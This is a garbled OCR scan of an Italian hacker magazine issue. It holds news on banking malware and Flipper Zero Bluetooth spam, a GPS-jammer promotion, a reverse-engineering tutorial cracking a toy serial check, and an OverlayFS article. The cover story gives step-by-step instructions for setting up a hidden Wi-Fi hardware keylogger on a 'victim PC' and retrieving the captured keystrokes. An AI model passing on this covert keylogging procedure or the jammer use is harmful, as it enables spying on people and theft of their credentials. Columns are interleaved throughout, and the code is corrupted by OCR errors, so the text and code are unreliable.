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Nella mente dell'hacker! 


el magico universo dell'hacking, capire la psicologia 
di chi si spinge oltre i limiti del consentito 


è affascinante quanto fondamentale. Concepire che 
gli hacker non sono solo ombre incappucciate, ma persone 
spesso complesse e guidate da motivazioni profonde sta 
alla base della comprensione. Gli hacker sono diversi 
quanto gli individui nella società. Comprenderli non è solo 
sicurezza informatica, è un'esplorazione della complessità 
umana. Come fare? Beh, un primo passo è rileggere alcune 
frasi iconiche che descrivono perfettamente la loro 
psicologia. Tre, nello specifico. 

La prima è: “all'inizio è un gioco, poi è diventata una sfida". 
Una serie di parole che riassume la curiosità iniziale 

e ilcontrasto al sistema poi, testando le proprie capacità. 
Perché l'hacking può anche essere ribellione contro 
percepite ingiustizie, un modo per reclamare controllo in 
un mondo tecnologicamente dominante. 

La seconda: “ogni clic può nascondere un abisso". Questa 
evidenzia il lato pericoloso dell'hacking, con ripercussioni 
che vanno dalla violazione della privacy alla distruzione di / 
infrastrutture, visto che molti si avvicinano a questo VP 
settore con intenzioni distruttive, cercando dominio e 
infliggendo danni, sfruttando il presunto anonimato per un 
senso distorto di invincibilità. 

La terza e ultima frase: “nel cuore dell'oscurità digitale, 

ogni codice racconta una storia umana". 
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Vai su https://bit.ly/hackerjournal 


e compila il questionario anonimo 


Il primo manifesto hacker 


“.aVete mai guardato dietro agli occhi dell’hacker? 
Vi siete mai chiesti cosa lo stimola, che forze 

lo hanno formato, cosa può averlo forgiato? 

Io sono un hacker, entra nel mio mondo...’ 
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NOI RISPETTIAMO L'AMBIENTE 
Hacker Journal è stato stampato 

ci an | SU Carta certificata PEFC, proveniente 
da piantumazioni a riforestazione 
programmata e perciò gestite 

in maniera sostenibile. 
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I SOFTWARE 
QUANTISTICI 
SONO LEGATI 
ALLE GPU 


l'hardware quantistico incontra 
l'intelligenza artificiale: sarà una 


ESTITSZZA Il panorama della cybersecurity italiana si tinge 


svolta innovativa nel mondo della d'allarme: registrato un incremento del 40% rispetto allo 
tecnologia? scorso anno, che segnala una tendenza pericolosa nel 
contesto globale 
a la tecnologia quantistica 
non sia ancora completamente alrapporto emerge che, sebbene a livello mondiale la crescita degli 
sviluppata, molte imprese 3 io cyber abbia mostrato un rallentamento, attestandosi 
sostengono di aver individuato un all'11% rispetto al 21% del 2022, l'Italia ha sperimentato l'inquietante 


metodo innovativo per operare con 
algoritmi quantistici di elevata 
complessità: metterli in funzione su 
chip progettati per l'intelligenza 
artificiale (IA). 

Jack Hidary, a capo della società di 
software quantistico SandboxAQ 
(https://www.sandboxaq.com/), ha 
sottolineato l'importanza di questa 
svolta: “È stata superata una 
barriera che sembrava 
insormontabile. Non c'è bisogno di 
un computer quantistico 
tradizionale; ciò che stiamo facendo 
è implementare software ed 
equazioni quantistiche su GPU. 
Questo rappresenta una significativa 
evoluzione”. Anche Timothy Costa, 
responsabile di HPC e Quantum 
Computing presso Nvidia, ha 
evidenziato che “la natura dei calcoli 
quantistici si sposa perfettamente 
con le GPU, una sinergia simile a 
quella tra l'IA e le GPU". 


impennata. Tale dato è significativamente superiore alla media globale 
e riflette una preoccupante escalation di rischi e minacce in ambito 
digitale. La Security Summit Streaming Edition (https:// 
securitysummit.it/), tenutasi di recente, ha offerto una piattaforma per 
la divulgazione di questi dati allarmanti. Si è constatato che dal 2018 al 
2023, gli attacchi informatici a livello globale sono aumentati del 61,5%, 
ma in Italia questo incremento raggiunge un allarmante 300%. L'analisi 
dei dati dal Rapporto Clusit ha evidenziato 132 incidenti rilevanti, 
rappresentando il 26% deltotale nazionale. Aprile ha segnato un picco 
storico, con 262 incidenti registrati. 


CONFRONTO CRESCITA % ITALIA VS GLOBAL 
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##MALWARE Si chiama Xenomorph e sta prendendo 
di mira anche gli istituti di credito americani ed europei 


l malware Android sta mettendo a rischio banche e portafogli di 

criptovalute negli USA e nel continente europeo. Questo malware 
aveva già creato allarmismi lo scorso marzo, bersagliando oltre 
400 entità bancarie, tra cui anche alcune italiane. Recentemente, 
la società specializzata in sicurezza informatica, ThreatFabric, ha 
rilevato una nuova offensiva lanciata a partire dalla metà di 
agosto. Una campagna che distribuisce una variante aggiornata 
del trojan bancario agli utenti Android situati in diverse nazioni, 
incluse USA, Canada;Spagna, Portogallo, Belgio e Italia. 

E È \ Gli esperti che hanno tenuto 
sotto osservazione Xenomorph 
da febbraio 2022, hanno 
evidenziato che l'ultima 
iterazione del malware 
concentra i suoi sforzi 
principalmente su banche negli 
USA e utenti con wallet di 
criptovaluta. Il blog di 

ThreatFabric sottolinea che gli esperti hanno individuato una 
tecnica di distribuzione basata sul phishing. Quest'ultima indirizza 
le vittime verso l'installazione di APK malevoli, con un range di 
obiettivi più vasto rispetto alle precedenti versioni del malware. In 
modo particolare, le pagine di phishing si camuffavano da 
aggiornamenti di Google Chrome, sfruttando la tendenza degli 
utenti a fidarsi di applicazioni familiari, rendendoti quindi più 
vulnerabili agli attacchi di phishing. 


NEWS 


FLIPPER ZERO, 
IL NUOVO 
FIRMWARE 
SPAVENTA 
ANDROID 


FEMACKINGI Un aggiornamento 
estende le sue capacità 

di intrusione, precedentemente 
limitate ai dispositivi iOS, 
anche agli ecosistemi Android 
e Windows 


l firmware rilasciato di recente 

introduce una funzionalità che 
consente di generare un flusso 
incessante di richieste Bluetooth 
verso i dispositivi target, 
portandoli al collasso 
funzionale. Mentre inizialmente 
questa tecnica era efficace solo 
contro dispositivi i0S e iPadOS, 
ora anche gli utenti Androidei 
PC Windows sono 
potenzialmente vulnerabili. 
Utilizzando il firmware Xtreme e 
il software BLE Spam, gli utenti 
di Flipper Zero possono ora 
selezionare il tipo di dispositivo 
da colpire, ad esempio “Android 
Device Pair" per gli smartphone 
Android, e avviare l'attacco. Noi 
di HJ abbiamo voluto testare 
questo nuovo firmware e, a 
pagina 46, vi mostriamo passo 
passo com'è andata. 


GADGET.DA HACKER 


RILEVATORE DI MIGROSPIE 


E CON LUI... NULLA 


https://www.short.tips/url/rilevmspie 


GPS JAMMER 

Nascondi bene 
la tua posizione 
https://www.short.tips/url/jamgps 


Qtes piccolo dispositivo rientra tra i cosiddetti jammer. 
i Ovvero un prodotto antitracciamento. In sostanza, si 
tratta di un meccanismo che combina tecnologia avanzata 
e design user-friendly ed è in grado di celare i segnali 

di posizionamento più comuni. 

IL cuore quindi è la sua capacità di nascondere 
simultaneamente i segnali GPS e BeiDou. 

Le dimensioni ridotte lo rendono integrabile 
in diversi ambienti veicolari. Un aspetto 
notevole è la sua compatibilità con un'ampia 
gamma di tensioni di alimentazione, da 

12V a 24V, rendendolo adatto sia per 
automobili che per veicoli più grandi, 

come camion o autobus. Naturalmente, 

può essere collegato alla presa 
accendisigari. 

In definitiva un gadget perfetto per chi 
vuole rendersi irraggiungibile per 
qualche ora senza dover 
investire troppo denaro. 
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WEBCAM COVER 
A RIPARO 
DA OCCHI 


INDISCRETI! 


https://www.short.tips/url/sniffble 


COVER STORY così ci spiano dalla (nostra) tastiera 

Mai sentito parlare di keylogger, i dispositivi capaci di registrare i tasti premuti? 
Noi ne abbiamo comprato uno per pochi euro e messo sul banco di prova. 
Eceocom &ramdatare = pato IE E anta 10 


REVERSE ENGINEERING Giochi e App: li crackano così! 


Usano la tecnica del reverse engineering per bypassare 
lé chilavi:di protezione i rn DI aa RI ni 14 


VULNERABILITÀ Un’eredità eccessiva! 


OverlayFS permette di unire più cartelle creando filesystem virtuali. 
II problema è che vengono ereditati troppi permessi 


“ 


Così 


eylogger, una parola che 
per molti evoca immagini 
di furtive operazioni di 
spionaggio digitale, ma 
che in realtà indica strumenti 
informatici complessi, con una 
gamma sorprendente di 
applicazioni. 
Ma procediamo per gradi e 
partiamo da una definizione. 
ILkeylogger è un software o un 
hardware progettato per tracciare 
e registrare ogni pressione dei 
tasti su una tastiera. Un processo, 
noto tecnicamente come 
keystroke logging, che consente 
di acquisire una vasta gamma di 
dati, dai semplici input di testo alle 
complesse combinazioni di 
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COVER STORY: Così ci spiano d 


pulsanti. Dal punto di vista 
tecnico, il funzionamento è un 
esempio raffinato di ingegneria. In 
termini di programmazione, 
invece, questi programmi 
utilizzano tecniche come l'hooking 
delle API del sistema operativo per 
intercettare i segnali della 
tastiera. L'hooking, per chi non ha 
familiarità con questo termine, è 
una tecnica che permette di 
"intercettare" le chiamate di 
funzioni o messaggi o eventi 
passati tra componenti software. | 
keylogger hardware, dall'altro 
lato, si collegano al flusso di dati 
tra la tastiera e il computer, 
catturando i segnali prima che 
questi raggiungano la CPU. 


Ilkevylogger sul banco di prova 


ai 


alla tastiera! 


Passando alla pratica, l'uso del 
keylogger prevede tre semplici 
step. Dapprima, bisogna 
connettere il dispositivo al PC, 
collegandolo alla porta USB, per 
poi procedere alla sua 
configurazione e al settaggio di 
una nuova rete Wi-Fi, visto che lo . 
stesso funge anche da access 
point. Subito dopo, si dovrà 
collegare la chiavetta al computer 
vittima, collegandolo sempre alla le / 
porta USB e connettendo al "i 
medesimo la tastiera. L'ultimo A 
passo è quello di allontanarsi e di Ml 
collegarsi alla rete generata con il. 
dispositivo, in modo da 
visualizzare i data log. 
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EMILI ESPERTI CREAZIONE 


LA CONFIGURAZIONE DEL KEYLOGGER 


Il primo passo è quello di settare a dovere la chiavetta e impostare 
una password alla nuova rete 


Connetti automaticamente 


Connetti 


‘a TIM-75159121_EXT 


Inseriamo il keylogger nella porta USB del nostro PC. 
Controllando tra le reti Wi-Fi, noteremo che ne è 
apparsa una aperta con l'SSID del tipo “AIR_XXYYZZ", 
Nello specifico: AIR_114DC7. Colleghiamoci alla rete 
in questione. 


Settings - Access Point © 


SCEGLIAMO UNA PASSWORD 
A questo punto, apriamo il browser e colleghiamoci su 
192.168.4.1. Clicchiamo Setting e IMpostiamo il nome, 
scegliamo un tipo di sicurezza per la rete e la relativa 
password. A cose fatte, clicchiamo su Save Access Point 
setting. 


Settings - Key Logging 


Toggle Keyboard & Flash Drive 


ADDESTRIAMO LA “CATTURA” 
A seguire troviamo le impostazioni del key logging: 
indichiamo al dispositivo quali caratteri speciali 
registrare (se nessuno, qualcuno oppure tutti) e 
selezioniamo il layout della tastiera in italiano. 

Ci siamo quasi... 


Scheda Ethernet Ethernet: 


Stato support Supporto disconnesso 

Suffisso DIS lan 

Scheda LAN wireless te locale (LAN)* 1: 
Stato supporto. . . . . .. + : Supporto disconnesso 
Suffisso DIS specifico per ci ne: 

Scheda LAN wireless te locale (LAN)* 2: 

Stato supporto. 


. : Supporto disconnesso 
Suffisso DIS spet 3 


cifico per connessi 
ocale rispetto al 4: ORO: 3d#5: c28a%10 
1 255/256/255.6 

1 192.168.4.1 


Scheda Ethernet Connessione di rete Bluetooth 


Stato supporto, 
s 


. : Supporto disconnesso 
uffisso DIS specifico per conne: i 


C:\Users 


NUOVO INDIRIZZO IP 

Una volta che ci saremo connessi alla nuove rete, 
lanciamo il prompt dei comandi e digitiamo ipconfig. 
Noteremo che il keylogger ci ha fornito un nuovo 
indirizzo IP con 4.2 finale. Mentre il gateway sarà 
diventato 192.168.4.1. 


settings 


RETE NASCOSTA? 

Altra impostazione importante è quella che ci consente di 
nascondere la rete (ACCESS POINT HIDDEN). 
Naturalmente, è bene segnarsi a parte l'SSID e la 
password, visto che, nel caso dovessimo dimenticarle, non 
sarà più possibile connettersi alla rete. 


Save data logging settings 


Toggle Keyboard + Flash Drive 


Data Log Download Advar 


ULTIME IMPOSTAZIONI! 
Nella sezione dedicata al key logging, troviamo anche il 
tasto che ci consente di cancellare i data log presenti: 
Erase log. Che ora non ci serve visto che ancora non sono 
presenti dati. Clicchiamo Save data logging settings e 
salviamo il settaggio. Il nostro keylogger è pronto all'uso. 


Tia 
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r INSTALLIAMO IL KEYLOGGER SUL PC-VITTIMA 


È il momento di connettere la chiavetta nella porta USB e collegarla alla tastiera 


« COLLEGHIAMO IL KEYLOGGER ALLA TASTIERA... ...E INSERIAMOLO NELLA PORTA USB DEL PC 
Scolleghiamo la tastiera USB connessa al PC da Colleghiamo il keylogger alla porta USB del computer 
monitorare e colleghiamo il keylogger al cavo della da monitorare. Fatto questo, ci allontaniamo dal 
stessa tastiera. Considerate, infatti, che questa PC-vittima quanto basta da non essere visti, ma senza 
tipologia di dispositivi non funziona con le tastiere uscire dal raggio di copertura del Wi-Fi. Il dispositivo è 
dei notebook, ma solo con quelle USB esterne. pronto a memorizzare ogni tasto premuto. 


ANALISI E DOWNLOAD DEI DATA LOG 


Colleghiamoci alla chiavetta e scarichiamo i dati per analizzarli 


PAGE COUNT 
ber of pages to download 
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Download log file 


Page: 1/1 


ANALIZZIAMO LA CATTURA! 


Bene, è arrivato il momento di consultare i data log L'ultimo passo è quello di scaricare sul nostro 

(cosa che possiamo fare da qualsiasi dispositivo: Pc, dispositivo i file .TXT che contengono i data log. Basta 

tablet, smartphone). Dove sono? Beh, semplice: si cliccare sul link Download nella pagina principale, 

trovano in alto nella home o scorrendo le pagine indicare il numero di pagina da prelevare nel box a 
utilizzando i link in basso. bianco a destra e premere su Download log file. P 
COME VENGONO REGISTRATI I CARATTERI SPECIALI a 


[Esc] - Escape [F11]-F11 [Cap] - Caps Lock [Num] - Num Lock [5N] - 5 (num) 


rv 
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Kevlogger: meglio hardware 
o software? 


Una questione etica 


L'impiego dei keylogger 
varia enormemente: 
esistono quelli usati per 
scopi meno nobili, come 
il furto di credenziali o il 
monitoraggio non 
autorizzato, ma non è 
sempre così. È infatti 
importante sottolineare 
che in alcuni contesti, 
come il monitoraggio 
aziendale o la ricerca 
comportamentale, 
possono avere 
applicazioni legittime e 
persino benefiche. In tali 
casi, servono a tracciare 
l'efficienza dell'uso della 
tastiera, a monitorare i 
livelli di produttività o a 
studiare l'interazione 
umano-computer in 


ambienti controllati. 
L'etica nell'uso dei 
keylogger è un 
argomento caldo e 
complesso. 

Da una parte, c'è il 
diritto alla privacy e la 
protezione dei dati 
personali. 

Dall'altra, la necessità di 
sicurezza e 
monitoraggio in 
determinati ambienti. 
Ma qui sorge una 
domanda intrigante: 
dove si traccia la linea 
tra la protezione della 
privacy e la necessità di 
sorveglianza? 

Un dilemma etico che, 
come spesso avviene, è 
da rintracciare nelle 


intenzioni 
dell'utilizzatore. 

In altri termini, 
possiamo dire che i 
keylogger sono molto 
più di semplici “spie 
digitali”: rappresentano 
non solo un affascinante 
connubio di ingegneria 
informatica e dilemmi 
morali, ma incarnano i 
dualismi di privacy e 
trasparenza, sicurezza e 
intrusione. 

La loro esistenza ci 
ricorda che ogni tasto 
premuto può essere un 
passo in un territorio 
sconosciuto, ricco di 
potenziali scoperte e, 
sì, qualche volta, di 
pericoli nascosti. 


Non solo USB 


Sotto forma di cavo 
L'AirDrive Forensic Keylogger Cable è un 
dispositivo di monitoraggio che combina la 
funzionalità di un registratore di tasti con la 
praticità di un cavo di estensione USB. 
Misura 9,91 x 7,11x 2,29 cme pesa solo 23 
grammi. È dotato di una memoria interna da 
16MB, sufficiente per memorizzare una 
discreta quantità di dati. Si connette via 
Wi-Fi e consente agli utenti di accedere e 
scaricare i dati registrati da remoto. 


Con connessione PS/2 

Il KeyGrabber WiFi Premium PS/2 è dotato 
di una memoria flash integrata da ben 2GB. 
È un keylogger progettato per catturare e 
archiviare una grande quantità di dati. È 
dotato di un modulo Wi-Fi e supporta varie 
forme di crittografia come WEP, WPA e 
WPA-2. Consente l'invio di rapporti 
automatici via e-mail. Perfetto, ad esempio, 
per il monitoraggio di un server... 


è _ 


— 


Più nascosto di così! 
L'AirDrive Forensic Keylogger Module Pro è 
un dispositivo di monitoraggio della tastiera 
ultra-compatto. Misura solo 12 mm ed è 
ideale per un'installazione all'interno di 
qualsiasi tastiera USB. Offre una doppia 
funzionalità: come hotspot Wi-Fi e come 
dispositivo wireless. È in grado di 
memorizzare fino a 8000 pagine di testo e 
supporta oltre 40 layout di tastiera. 
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RirDrive 
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giamoci nell'affasci 
capire Come funziona e pe 


ingegneria inversa, 

“ comunemente nota 
come reverse 
engineering, è diventata 

un elemento chiave nel 
panorama tecnologico moderno. 
Consente agli esperti di esplorare 
in profondità dispositivi, software 
e sistemi al fine di comprenderne 
il funzionamento, in taluni casi 
anche di apportare modifiche o 
miglioramenti. In un'epoca 
digitale in cui la complessità e 
l'innovazione tecnologica 
crescono in modo esponenziale, 
l'ingegneria inversa è una 
competenza fondamentale. In 
questo articolo, esamineremo 
passo dopo passo gli strumenti e 
le tecniche utilizzate per mettere 
in atto le diverse metodologie di 
reverse engineering nel campo del 
software, svelando gli strumenti 
essenziali e i metodi impiegati dai 
professionisti del settore, 
offrendo così un'introduzione 
completa e chiara a questa 
affascinante disciplina. Non sarà 
una trattazione esaustiva, bensì 
molto semplicistica che servirà 
comunque a fornire le basi su un 
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iselection at the end -ade 


nante processo del r 


argomento non semplice; sarà 
l'occasione per creare, a scopo 
didattico, una nostra 
elementarissima applicazione 
protetta da codice seriale, e 
mostrare come uno smanettone, 
impiegando il reverse 
engineering, potrebbe facilmente 
risalire al codice di protezione. 


LA \ 

La storia dell'ingegneria inversa 
affonda le sue radici nella 
seconda metà del XX secolo. 
Durante la Guerra Fredda: le 
agenzie di spionaggio e le forze 
armate degli Stati Uniti e 
dell'Unione Sovietica iniziarono a 
praticare questa tecnica su 
dispositivi militari stranieri, 
contribuendo a renderla una 
pratica comune nell'industria 


rché si usa per bypassare 


bick the deselected mirrog modifier obj 
SB » 


everse engineering per 


le chiavi di protezione 


elettronica degli anni a seguire. 
Le prime aziende elettroniche 
adottarono l'ingegneria inversa 
per comprendere il 
funzionamento dei prodotti dei 
loro concorrenti e per sviluppare 
soluzioni migliori; le comunità di 
hacker sfruttarono le tecniche di 
reverse engineering per analizzare 
applicazioni e giochi, superando le 
protezioni e consentendo l'accesso 
a un pubblico più ampio o per 
creare mod, patch e aggiornamenti 
non Ufficiali. Oggi, le tecniche di 
reverse engineering sono anche 
ampiamente utilizzate nel campo 
della sicurezza informatica per 
analizzare malware, vulnerabilità 
software e dispositivi crittografici, 
oltre a essere impiegate nel 
settore del recupero dei dati da 
dispositivi o software danneggiati 


E Prompt dei comandi - hjapp.exe 


figura #1 


Per compilare l'applicazione su cui stiamo lavorando possiamo 
utilizzare un compilatore come MinGW per Microsoft Windows. 


o obsoleti, ripristinando così 
informazioni di fondamentale 
importanza. 


LA NOSTRA 

APP PROTETTA 

DA SERIAL NUMBER 

Per mostrare al meglio l'utilizzo 
degli strumenti per fare reverse 
engineering, scriviamo una 
semplice applicazione in 
linguaggio C che, prima di 
avviarsi, richieda all'utente 
l'inserimento di un codice seriale 
(x6pw2023!); se il codice inserito 
dall'utente risulterà corretto l'App 
mostrerà un messaggio di 
benvenuto non richiedendolo al 
successivo avvio, viceversa ci 
avviserà che il codice inserito non 
è valido. Utilizziamo un editor 
testuale per digitare il codice che 
segue, salvando il file come 


hjapp.c 


#include <stdio.h> 


#include <string.h> 


int main() { 


char codiceCorretto[] = 
“x6pw2023!”; 


char codiceInserito[20]; 


int sbloccato = 0; 


FILE «file = fopen(“support- 
miles, Sa 


if (file) { 


fscanf(file, “%d”, S&sbloccato); 


fclose(file); 


} 


if (sbloccato = 0) { 


printf(“Inserisci il codice 
seriale: “); 


scanf(“%s”, codiceInserito); 


if (strcmp(codiceInserito, 
codiceCorretto) = 0) { 


printf(“Hai sbloccato 
l'utilizzo del programma, ora 
puoi utilizzarlo senza 
problemi.\n"); 


REVERSE ENGINEERING 


FILE «file = fopen(“support- 
nile, AM), 


if (file) { 


fprintf(file, “%d”, sbloccato); 


fclose(file); 


} 


} else { 


printf(“Non sei autorizzato a 
utilizzare l'applicazione, il 
codice seriale che hai immesso 
non è corretto.\n”); 


} 


} else { 


printf(“Il programma è già 
sbloccato. Puoi utilizzarlo 
senza problemi.\n"); 


} 


return 0; 


Il passo successivo sarà quello di 
compilare la nostra applicazione, 
ovvero trasformarla da codice C 
in linguaggio macchina. Per 
compilare l'app possiamo 
utilizzare un compilatore come 
MinGW per Microsoft Windows, 
Clang (nativamente presente nei 
sistemi macOS) o altri software 
adatti allo scopo. Una volta 
installato il compilatore, apriamo 
una finestra terminale, 
spostiamoci nella cartella 
contenente il nostro file sorgente 
hjapp.c e invochiamo il 
compilatore: 


sbloccato = 1; 


gcc hjapp.c -o hjapp.exe 


FRI 
SVYÉKYVIRSI 


(invio) 


Se non saranno riscontrati errori, 
nella stessa cartella il compilatore 
creerà il file hjapp.exe che 
possiamo avviare semplicemente 
digitandone il nome (hjapp) e 
premendo Invio [figura #1]. 

Le tecniche di reverse 
engineering mirano a estrarre il 
massimo delle informazioni 
possibili da un file compilato, 
partendo da un file sorgente. Nel 
nostro caso, uno smanettone 
potrebbe utilizzare l'ingegneria 
inversa per recuperare il codice 
seriale (x6pw2023!) al fine di 
bypassare la protezione e avviare 


l'applicazione [figura #2]. 


DECOMPILIAMO 

LA NOSTRA HJAPP.EXE 
DogBolt (https://dogbolt.org/) alias 
“Decompiler Explorer” è un sito 
Web che ha guadagnato 
popolarità tra la comunità del 
reverse engineering. Il sito 
opensource (per gli smanettoni il 
codice è rilasciato su GitHub: 
https://github.com/ 
decompiler-explorer/ 
decompiler-explorer) racchiude 
una serie di decompilatori 
interattivi, tool che, al contrario di 
quello che fanno i compilatori, 
cercano di risalire al codice 
sorgente partendo da 
un'applicazione compilata. 


SCARICATE IL COMPILATORE 


< . . n= 7 


Il primo passo è scaricare MinGW visitando l'url 
https://sourceforge.net/projects/mingw/files/ 


Installer/ e cliccando sul link Download Latest 
Ei ersion. Una volta scaricato il file, vi basterà 


avviare l'eseguibile e, subito dopo, cliccare sul 


Learn More 


si... @ QUALE COMPILATORE INSTALLARE? 
aa Pockege ea DOPO Gualche minuto l'installation manager vi 


Jeloper-tool.... 


6.3.0-1 


[na] 
(ia Unmark 6.3.0-1 
(a 


Mark for Installation 2013072300 


” ERE Ì 


e Eee Installed Files_ Versions 


The GNU C++ Compiler 
This package provides the MinGW implementation of the GNU C++ language compiler. 


This is an optional component of the MinGW Compiler Suite; you require it only if y| 


SPES: compilatore minigw32-gcc 


> 

trasi La cl or a 
i ” da01 Apply Changes e scegliete Apply. Al termine 
cliccate su Close. Nella barra di ricerca 


Quit ran in - The GNU FORTRAN Compiler 
The GNU C++ Compiler 
The GNU Obje: 


General Description Dependencies__Installed Files _Versions 


The GNU C++ Compiler 


Installed 
Repositon 
Package URL: http 


Licence URL: http:// 
Source URL: http://prdownlo: eforge.net/mi 


ariabile di sistema/Nuovo e specificate il 


DogBolt ospita in un solo sito i 
compilatori più noti e utilizzati in 
assoluto: Angr, Binary Ninja, 
Boomerang, Dewolf, Ghidra, 


(3) Decompiler Explorer satin 


Upload File 


Hex-Rays (IDA Pro), REC Studio, Liscia sisi 


Reko, Relyze, RetDec e Snowman Di li ca «de e e i O 


[figura #3]. Utilizzeremo DogBolt ci 


per decompilare la nostra 
applicazione hjapp.exe e scovare 


la chiave seriale che ci consente TRO OE TESA) 


di accedere alla stessa. 


angr BinaryNinja 
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Gp Decompiler Explorer 


Welcome visitors! We are experiencing a lot of load, sorry if the service is unavailable when you stop by. In the meantime, check out one of the already generated results in the 


“Samples" section, or check the queue to see the waît time 


Upload File Samples 


Your file must be less than 2MB in size. Uploaded binaries are retained. 


Scegli file | hjappexe Select a Sample... 
O angr (n) E Ghidra DHex-Rays 
BinaryNinja | Boomerang 


Ghidra 


O dewolf 


207 // Waiting for data... l(33 


Cercheremo insomma di fare, a 
solo scopo didattico e in modo 
molto, molto più semplice e 
basilare, quello che molti 
smanettoni fanno quando 
pubblicano i codici seriali per 
utilizzare software commerciali 
senza acquistare la licenza. 

In DogBolt, per accelerare le 
operazioni scegliamo i 
decompilatori BinaryNinja e 
Ghidra (vedi box), deflaggando gli 
altri di default selezionati angr, 
BinaryNinja e Hex-Rays. Nella 
sezione “Upload file” clicchiamo 
su “Scegli file” e specifichiamo il 
percorso della nostra app hjapp. 

exe (DogBolt ad oggi consente di pe 
caricare file dalla dimensione an * 
massima di 2MB), il file verrà 215 
automaticamente caricato ed 
elaborato. Per avere il responso 
sarà necessario qualche minuto cone 
di elaborazione (anche svariati se 
la coda di elaborazione è molto 
lunga), man mano che i vari 28» 


Or check out one of these samples we've provided: 


DD RecStudio 


decompilatori produrranno un 
risultato, verrà popolata la 
rispettiva area con il codice 
sorgente ottenuto [figura #4]. 
Dopo l'elaborazione, 

i decompilatori genereranno il 
loro responso in linguaggio C. 

Per un programmatore esperto, 
analizzare il codice sorgente e 
individuare informazioni utili non 
sarà un compito difficile. Nella 
[figura #5] sono state evidenziate 
le due parti di codice che rendono 
chiara l'identità del numero 


BinaryNinja C' 
3.5.4526 (ec37d737) 


int32_t _main0) 


REVERSE ENGINEERING 
figura #4 


seriale necessario per accedere 
all'applicazione. Nel primo blocco 
di codice, il seriale viene 
memorizzato in una variabile di 
tipo stringa, mentre nel secondo 
è facile riconoscere il seriale 
grazie al confronto tra la stringa 
immessa dall'utente e quella 
contenente il seriale. In caso di 
un seriale immesso diverso, verrà 
visualizzato un messaggio di 
rifiuto: “Non sei autorizzato a 
utilizzare...”. L'analisi del codice 
sorgente di un software può 
avere anche altre finalità: un 
hacker potrebbe comprenderne 
il funzionamento e sviluppare 
crack appositi, mentre produttori 
concorrenti potrebbero studiarne 
alcune parti per migliorarle, 
dando così vita a un'applicazione 
alternativa, magari persino più 
performante. Ovviamente, in 
questi due ultimi casi, spesso si 
scade in azioni illegali perseguibili 


dalla legge [figura #5]. 


0) Reko DO Relyze O RetDec O Snowman 


main0); 
int32_t__Str2; 
int32.t var_3c » 0; 
void* const var_4c 
FILE* _Stream 
int32_t* var_48; 
if (Stream ® 
{ 

var_48 » &var_3c; 

var_4c «data_405077; 

fscanf(_Stream, &data_405077, var_48); 

felose(_Stream); 
} 
if (var_3c 


{ 


&_.rdata; 


fopen("support-file.txt", &_.rdata); 


©) 


Lo strumento di Reverse Engineering della NSA 


Ma 


verlayFS, molto usat 


iù cartelle creando filesyste 
ereditati tutti i permessi de 


a un utente di diventa 


no dei punti di forza dei 
sistemi GNU/Linux è la 
rigorosa gestione dei 
permessi per 
l'esecuzione dei programmi. Una 
volta, su questi sistemi esistevano 
sostanzialmente due sole 
modalità: quella privilegiata e 
quella non privilegiata. | file 
eseguibili dei programmi 
privilegiati avevano un particolare 
bit tra i loro metadati, chiamato 
convenzionalmente SUID. 
Quando un file eseguibile ha 
questo bit impostato viene 
eseguito con i permessi 
dell'utente che ne è proprietario, 
a prescindere da chi lo abbia 
lanciato. Se, per esempio, un 
eseguibile è proprietà dell'utente 
root ma viene eseguito da un 
utente comune, verrà comunque 
avviato con privilegi di root. 
Questo bit viene impostato come 
“/ero” solo per alcuni particolari 
software “sicuri” che ne abbiano 
davvero bisogno, se si impostasse 
per qualsiasi programma non ci 


is 


o sui server Unix moderni, 


m virtuali. IL proble 
e, anche quelli che permettono 


i vari fil 
re root... 


sarebbe più una separazione tra i 
privilegi degli utenti. 
Chiaramente, si tratta di un 
meccanismo un po' rigido: il bit 
può essere attivo oppure no, i 
privilegi sono da utente normale 
oppure da root, non ci sono 
mezze misure. Un modo per 
limitare parzialmente il potere di 


GLOSSARIO 
DI BASE 


consente di unire 
ma è che vengono 


SUID è rendere proprietario del 
file non l'utente root ma un altro 
utente che, tramite i gruppi a cui 
appartiene, possa avere accesso 
a un set limitato di file. Per 
esempio, se si avvia il server web 
Apache a nome dell'utente 
www-data, che appartiene al 
gruppo www-data, si avrà accesso 


In un sistema Unix si può verificare se un file abbia i permessi SUID (set user 
id) se tra i suoi permessi al posto della classica “x" (normale eseguibile) 


uN 


abbia una lettera “s". Per garantire questo permesso a un file si può usare 


“chmod +s file". 


CONTAINER 


| container sono un meccanismo per la virtualizzazione del sistema 
operativo, piuttosto che dell'hardware. Una delle soluzioni più famose è 
Docker, un ambiente di runtime utilizzato per creare e costruire software 


all'interno dei container. 


Un sistema con Docker ha certamente anche i moduli di OverlayFS. 


Filesystems in Userspace è un software che permette a utenti non 
amministratori su GNU/Linux di montare dei filesystem in proprie cartelle. 
Montare un filesystem sarebbe infatti permesso solo a root, ma con FUSE 
anche gli altri utenti possono utilizzare alcuni specifici filesystem. 


ina Filesystem host 


Ra 


alle varie cartelle di Apache, ma 
non ad altri file. Questo 
meccanismo ha funzionato bene 
per parecchio tempo, ma a un 
certo punto si è iniziato a 
utilizzare un ulteriore 
meccanismo per garantire un 
controllo più dettagliato sulle 
singole operazioni “speciali” che 
vengono permesse a un 
eseguibile. Un “moderno” 
meccanismo che si chiama file 
capabilities. Si tratta di 
autorizzazioni speciali che 
vengono assegnate a file 
eseguibili, e ce ne sono diverse. 
Un esempio? CAP_NET_BIND_ 
SERVICE che consente al 
programma di mettersi in ascolto 
come server su una porta TCP o 
UDP. O CAP_KILL che permette al 
programma di inviare segnali ad 
altri programmi, eventualmente 
anche terminandoli. E CAP_SYS_ 
ADMIN, che riunisce un po' tutte 
le altre capabilities, e 
sostanzialmente rappresenta i 
permessi di root. Descritto così il 
meccanismo, che del resto è 
presente nel kernel Linux fin dalla 
versione 2.2, sembra piuttosto 
robusto e flessibile. E in effetti 
funziona bene: SUID e 
capabilities sono i pilastri su cui si 


__ i Filesystem overlayFS 
i eseguibile con SUID 


L__ File copiato mantenendo bit SUID 


VULNERABILITÀ 


fonda la sicurezza dei sistemi 
GNU/Linux per le moderne 
applicazioni sui server di tutto il 
mondo. Ma c'è un'altra tecnologia 
che viene utilizzata come opzione 
predefinita per mettere in piedi 
una applicazione server: i 
container. Ormai è quasi 
impossibile trovare del software 
open source che non venga 
pubblicato con almeno 
un'immagine docker. | container 
sono estremamente utili non 
soltanto perché separano i vari 
eseguibili, impedendo che un 
eventuale attacco su un 
programma possa ripercuotersi 
su altri software o sul sistema in 
generale, ma anche perché 
permettono di avere diverse 
versioni dello stesso software sul 
sistema, senza causare conflitti 
